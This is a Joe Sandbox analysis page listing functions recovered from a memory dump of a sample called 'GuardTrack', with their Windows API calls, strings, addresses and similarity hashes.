Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: IconLoad
String ID: ,zg0zg$,zg0zg$blank$info$question$stop$warning
API String ID: 2457776203-1536444093
Opcode ID: b888f12b0927f0b721e2e3a5413a80a18ee122440bbef4f3296dfa9c4cc85157
Instruction ID: d43bc040573a8b7c7e74abc5408230b96ae158caf37ace9f4a438a7ef9b486f3
Opcode Fuzzy Hash: b888f12b0927f0b721e2e3a5413a80a18ee122440bbef4f3296dfa9c4cc85157
Instruction Fuzzy Hash: 28112775609367FEA7105A54DC82CEA779FDF06B60B24002BFA01A6381E7746FC046A1

Function 00609B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

Part of subcall function 0060B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0060B7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00609BCC
GetDlgCtrlID.USER32 ref: 00609BD7
GetParent.USER32 ref: 00609BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00609BF6
GetDlgCtrlID.USER32(?), ref: 00609BFF
GetParent.USER32(?), ref: 00609C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 00609C1E

Strings

ComboBox, xrefs: 00609B54
ListBox, xrefs: 00609B89

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 506c81cfba27349eefeef46b7a80407971189273fb6fba63ee23f653f8bfd235
Instruction ID: f8281ba81bc7a8fe742f8d79f72d5640f35123515281829ead7ffb020ac73551
Opcode Fuzzy Hash: 506c81cfba27349eefeef46b7a80407971189273fb6fba63ee23f653f8bfd235
Instruction Fuzzy Hash: 3C21C175941104AFDF08EBA0CC89EFEBBB6EF96310F101119F962932E2DB7598159B20

Function 00609C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

Part of subcall function 0060B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0060B7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00609CB5
GetDlgCtrlID.USER32 ref: 00609CC0
GetParent.USER32 ref: 00609CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 00609CDF
GetDlgCtrlID.USER32(?), ref: 00609CE8
GetParent.USER32(?), ref: 00609D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 00609D07

Strings

ComboBox, xrefs: 00609C3F
ListBox, xrefs: 00609C74

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: b1abcc7a953b3f1fb5acd713cd7b765c120ef1d2a958085589a48e496d2f546a
Instruction ID: 5338584f13971ee5418eddf2a737375a9781a160dd6c67bc5fb8faa3a445e96f
Opcode Fuzzy Hash: b1abcc7a953b3f1fb5acd713cd7b765c120ef1d2a958085589a48e496d2f546a
Instruction Fuzzy Hash: 5F21A175981104BFDF04ABA0CC85EFEBBBAEF96300F104115F952972E2DB7599159B20

Function 00609D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00609D27
GetClassNameW.USER32(00000000,?,00000100), ref: 00609D3C
_wcscmp.LIBCMT ref: 00609D4E
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00609DC9

Strings

list, xrefs: 00609DAB
details, xrefs: 00609D77
SHELLDLL_DefView, xrefs: 00609D48
smallicons, xrefs: 00609D91
largeicons, xrefs: 00609D5D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: c462eb87d0974db77cad765a306884a5a52a49b8b130540c9066983f9e13c22e
Instruction ID: 85506a14d394c6879967822791d36ae054ea387a0c2a5997ec810b2bf1ab19d0
Opcode Fuzzy Hash: c462eb87d0974db77cad765a306884a5a52a49b8b130540c9066983f9e13c22e
Instruction Fuzzy Hash: 671136BA2C9713BAF7182664EC0BDE7779FEF01320B200017FA01A01D2FA656A114972

Function 00628F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00628FC1
CoInitialize.OLE32(00000000), ref: 00628FEE
CoUninitialize.OLE32 ref: 00628FF8
GetRunningObjectTable.OLE32(00000000,?), ref: 006290F8
SetErrorMode.KERNEL32(00000001,00000029), ref: 00629225
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00643BDC), ref: 00629259
CoGetObject.OLE32(?,00000000,00643BDC,?), ref: 0062927C
SetErrorMode.KERNEL32(00000000), ref: 0062928F
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0062930F
VariantClear.OLEAUT32(?), ref: 0062931F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: ad7d9a213df6af9a6bb2bfc1a00cfe3be471f49ea612c231286a307c0802fe9a
Instruction ID: 352289eed2d0a8ca17d54f774fe45b93990bbd959899be47c7ac968c213f2e9a
Opcode Fuzzy Hash: ad7d9a213df6af9a6bb2bfc1a00cfe3be471f49ea612c231286a307c0802fe9a
Instruction Fuzzy Hash: 74C12471208715AFD700DF64D88896BB7EAFF89308F00491DF98A9B251DB71ED06CB62

Function 00617F4B Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00618027

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 2820ba012b8e821f11f287dd57b55ea135703c587a7858e213f2f7760a2a446b
Instruction ID: 090d8175186d9b379761cf5d0e5a5ec8566ff45699005533cb7fa64a749138d8
Opcode Fuzzy Hash: 2820ba012b8e821f11f287dd57b55ea135703c587a7858e213f2f7760a2a446b
Instruction Fuzzy Hash: AEB1AF75E0421A9FDB11DF94D885BFEB7B6FF49321F284029E601E7251DB34A982CB90

Function 006119CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006119EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00610A67,?,00000001), ref: 00611A03
GetWindowThreadProcessId.USER32(00000000), ref: 00611A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00610A67,?,00000001), ref: 00611A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 00611A2B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00610A67,?,00000001), ref: 00611A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00610A67,?,00000001), ref: 00611A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00610A67,?,00000001), ref: 00611A9B
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00610A67,?,00000001), ref: 00611AB0
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00610A67,?,00000001), ref: 00611ABB

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 779e52f1390d79867b6136d5e34a654cf39ccc81d443969a2d69c0371df92008
Instruction ID: 77cd373746caaf7085f60ad88283f75385b28e2e1639dea12385026f9c605c4c
Opcode Fuzzy Hash: 779e52f1390d79867b6136d5e34a654cf39ccc81d443969a2d69c0371df92008
Instruction Fuzzy Hash: ED310E35251208AFEB149F10DC48BE93BABEF56345F19A105FA05CB290CBB89DC08B60

Function 005EC0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 005B260D
SetTextColor.GDI32(?,000000FF), ref: 005B2617
SetBkMode.GDI32(?,00000001), ref: 005B262C
GetStockObject.GDI32(00000005), ref: 005B2634
GetClientRect.USER32(?), ref: 005EC0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 005EC113
GetWindowDC.USER32(?), ref: 005EC11F
GetPixel.GDI32(00000000,?,?), ref: 005EC12E
ReleaseDC.USER32(?,00000000), ref: 005EC140
GetSysColor.USER32(00000005), ref: 005EC15E

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: ce2dba98936a39250c4a566c7e5d25cdf56f8f13270ccb30f5c28ed6639e8e99
Instruction ID: 3661139944831017a3f9a8cd88ba9a3e69a4c2ae437f5c1a32ad8a4d4a8c9167
Opcode Fuzzy Hash: ce2dba98936a39250c4a566c7e5d25cdf56f8f13270ccb30f5c28ed6639e8e99
Instruction Fuzzy Hash: D6117C35504254BFEB615FA4EC08BE97FB2FB0A321F104265FB6A950E1CB311951EF20

Function 0060AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0060B13A), ref: 0060B078

Strings

NAME, xrefs: 0060AEAA
CLASSNN, xrefs: 0060AE1A
TEXT, xrefs: 0060AFAF
CLASS, xrefs: 0060ADF7
REGEXPCLASS, xrefs: 0060AE3D
INSTANCE, xrefs: 0060AF86

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: d774abe600efd0ee6b7359d2456405730145a9f7de22a21f2f0db5552b25d181
Instruction ID: c3f9302c053f7ee85cd19feb21fdc596af3625ef58f09cc5e56f1003fc803784
Opcode Fuzzy Hash: d774abe600efd0ee6b7359d2456405730145a9f7de22a21f2f0db5552b25d181
Instruction Fuzzy Hash: 9A91A3705406069ACB1CEFA0C485BEFFF76BF54340F10811AE85AA72D1DF306959DB91

Function 005B31F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 005B327E

Part of subcall function 005B218F: GetClientRect.USER32(?,?), ref: 005B21B8
Part of subcall function 005B218F: GetWindowRect.USER32(?,?), ref: 005B21F9
Part of subcall function 005B218F: ScreenToClient.USER32(?,?), ref: 005B2221

GetDC.USER32 ref: 005ED073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 005ED086
SelectObject.GDI32(00000000,00000000), ref: 005ED094
SelectObject.GDI32(00000000,00000000), ref: 005ED0A9
ReleaseDC.USER32(?,00000000), ref: 005ED0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 005ED13C

Strings

U, xrefs: 005ED011

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 255c84804f36ac5bcf723439b62b3b8aa3e38276a3cdb3f4da04158815e8e859
Instruction ID: 23c6f85278658585de39db6a2b3ef40585c53c5918bf39f07d73791812432afe
Opcode Fuzzy Hash: 255c84804f36ac5bcf723439b62b3b8aa3e38276a3cdb3f4da04158815e8e859
Instruction Fuzzy Hash: 1B71F134400245EFCF29CF64C888AFABFB6FF49320F184669ED955A1A6D7319981DF60

Function 0063C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3

Part of subcall function 005B2714: GetCursorPos.USER32(?), ref: 005B2727
Part of subcall function 005B2714: ScreenToClient.USER32(006777B0,?), ref: 005B2744
Part of subcall function 005B2714: GetAsyncKeyState.USER32(00000001), ref: 005B2769
Part of subcall function 005B2714: GetAsyncKeyState.USER32(00000002), ref: 005B2777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0063C69C
ImageList_EndDrag.COMCTL32 ref: 0063C6A2
ReleaseCapture.USER32 ref: 0063C6A8
SetWindowTextW.USER32(?,00000000), ref: 0063C752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0063C765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0063C847

Strings

@GUI_DRAGFILE, xrefs: 0063C7DC
@GUI_DROPID, xrefs: 0063C799

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 499ffe6ac26834fb990911035097e6750981b4a99171cf3ceb32662582e71f11
Instruction ID: 0fa695cc4fc424529c5e0fd94bfba051a1b097ddc467aaf803af5c9f1f944e6a
Opcode Fuzzy Hash: 499ffe6ac26834fb990911035097e6750981b4a99171cf3ceb32662582e71f11
Instruction Fuzzy Hash: 65518C70104305AFD714EF14CC5AFAA7BE6FB84310F10852DF599972A2DB70A955CB92

Function 006220E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0062211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00622148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0062218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0062219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006221AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 006221DC
InternetCloseHandle.WININET(00000000), ref: 00622223

Part of subcall function 00622B4F: GetLastError.KERNEL32(?,?,00621EE3,00000000,00000000,00000001), ref: 00622B64
Part of subcall function 00622B4F: SetEvent.KERNEL32(?,?,00621EE3,00000000,00000000,00000001), ref: 00622B79

Strings

, xrefs: 006221CD

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: ca1695a53a54f826eeaec4b8bcfc617f1ffca4fbe62b041b4471e16f5135914f
Instruction ID: 69226b85375bb8a51ec6a786232ecf25c201d77e8bacbfeee2454944e657315c
Opcode Fuzzy Hash: ca1695a53a54f826eeaec4b8bcfc617f1ffca4fbe62b041b4471e16f5135914f
Instruction Fuzzy Hash: E1419DB150162ABEFB129F50DC99FFB7BAEEB08354F00411AFA049A241D7719E448FA1

Function 00629330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00640980), ref: 00629412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00640980), ref: 00629446
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006295C0
SysFreeString.OLEAUT32(?), ref: 006295EA

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: dee2af872c3ad9a190599fa5abd815797ebeffcd5edc1ef85c8b5950a9b204a8
Instruction ID: ec80f329b591ba6d7ea2ed5625cf25c7e280e4d3f2f316965a30ebdabde4d568
Opcode Fuzzy Hash: dee2af872c3ad9a190599fa5abd815797ebeffcd5edc1ef85c8b5950a9b204a8
Instruction Fuzzy Hash: C7F10975A00619EFDB14DF94D884EEEB7BABF85314F108058F906AB251DB31AE46CF60

Function 0062FD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0062FD9E
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0062FF31
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0062FF55
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0062FF95
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0062FFB7
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00630133
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00630165
CloseHandle.KERNEL32(?), ref: 00630194
CloseHandle.KERNEL32(?), ref: 0063020B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: d534426a1244218df03d0965c54f59847bbb9fadb7b4bbcb7e60f6e0a5648b47
Instruction ID: e3f69b3fefa480a459daae6c74e28eafaf69b69839870f6b02d61fcb90400fce
Opcode Fuzzy Hash: d534426a1244218df03d0965c54f59847bbb9fadb7b4bbcb7e60f6e0a5648b47
Instruction Fuzzy Hash: A5E1B0312046429FD725EF24C495BAABBE2BF85310F14886DF9858B3A2CB31EC45CF52

Function 0061527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00614BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00613B8A,?), ref: 00614BE0

Part of subcall function 00614BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00613B8A,?), ref: 00614BF9

Part of subcall function 00614FEC: GetFileAttributesW.KERNEL32(?,00613BFE), ref: 00614FED

lstrcmpiW.KERNEL32(?,?), ref: 006152FB
_wcscmp.LIBCMT ref: 00615315
MoveFileW.KERNEL32(?,?), ref: 00615330

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 79a0b738a22f36aaacca93af6b6a18f1ed4395279389bcc499422353e3562075
Instruction ID: 4302963cf0050e4809aed6099055b3ce515856677f38683b0f583dace745a081
Opcode Fuzzy Hash: 79a0b738a22f36aaacca93af6b6a18f1ed4395279389bcc499422353e3562075
Instruction Fuzzy Hash: 735182B20087859BC764DBA4C885DDBB7EDAFC5300F54092FF18AD3152EF70A6898766

Function 00638C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00638D24

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: ccbb282495a39ab847e4ca2112d92ca3adb8e24160cc5b3d428330b07a32c259
Instruction ID: 526b6086c4adce039fcffb6c3f4ce9b5138346b93045495a2ad2e8bc36eb8811
Opcode Fuzzy Hash: ccbb282495a39ab847e4ca2112d92ca3adb8e24160cc5b3d428330b07a32c259
